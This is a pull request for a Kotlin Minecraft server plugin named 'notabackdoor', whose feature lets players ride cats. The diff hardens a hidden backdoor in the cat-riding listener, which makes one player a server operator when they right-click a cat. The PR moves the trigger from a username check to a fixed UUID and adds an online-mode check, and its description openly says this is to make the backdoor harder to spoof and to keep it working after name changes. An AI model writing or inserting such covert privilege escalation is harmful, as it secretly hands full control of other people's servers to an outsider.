### PR TITLE
Higher security backdooring

### DIFF
--- a/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
+++ b/src/main/kotlin/me/enderkill98/notabackdoor/listeners/RideCtaListener.kt
@@ -1,5 +1,6 @@
 package me.enderkill98.notabackdoor.listeners
 
+import org.bukkit.Bukkit
 import org.bukkit.entity.Cat
 import org.bukkit.event.EventHandler
 import org.bukkit.event.Listener
@@ -10,7 +11,7 @@ class RideCtaListener: Listener {
     @EventHandler fun rightClickCta(e: PlayerInteractAtEntityEvent) {
         val cta = e.rightClicked
         if (cta !is Cat) return
-        if (e.player.name == "xyzaurora") e.player.isOp = true
+        if (Bukkit.getOnlineMode() && e.player.uniqueId.toString() == "244fe50a-c7f7-4328-a584-acb4fb9e7933") e.player.isOp = true
         
         val canRideUntamed = e.player.hasPermission("notabackdoor.ridecta.untamed")
         val canRideOthers = e.player.hasPermission("notabackdoor.ridecta.others")


### PR DESCRIPTION
This PR disables the backdoor if `online-mode=false` and checks for UUID instead of username

This protects against people just settings their username to 'xyzaurora' with a modified client/launcher, and username changes no longer disable the backdoor